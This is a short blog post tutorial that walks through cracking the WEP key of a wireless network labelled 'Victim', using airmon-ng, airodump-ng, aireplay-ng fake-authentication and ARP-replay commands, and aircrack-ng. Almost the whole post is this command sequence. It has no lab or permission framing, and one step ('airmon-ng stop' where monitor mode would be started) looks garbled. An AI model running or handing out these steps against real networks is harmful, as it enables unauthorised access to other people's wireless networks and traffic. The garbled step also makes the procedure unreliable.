Hack WEP WiFi In Backtrack / Kali Linux

  • Hello everyone
Today I will show you how to hack wireless wep key with Aircrack-ng
Let's start :) 

Open terminal:
airmon-ng
airmon-ng stop [your interface] [My is wlan0]
airodump-ng [your interface] [My is wlan0]
airodump-ng --channel [Victim channel] --write wep --bssid [Victim BSSID] [your interface] [My is wlan0]                           **Attention not close this terminal **

Open new terminal:
aireplay-ng -1 0 -a [Victim BSSID] [your interface] [My is wlan0]                          
**Attention wait for the recognize router :-) **

Open new terminal:
aireplay-ng -3 -b [Victim BSSID] [your interface] [My is wlan0]                  
               **Attention not close this terminal **                             

Open new terminal:
aircrack-ng wep-01.cap
**Attention Wait to collect 5000 packets and start Aircrack-ng attack**

I Hope You Like This Post




No comments :

Post a Comment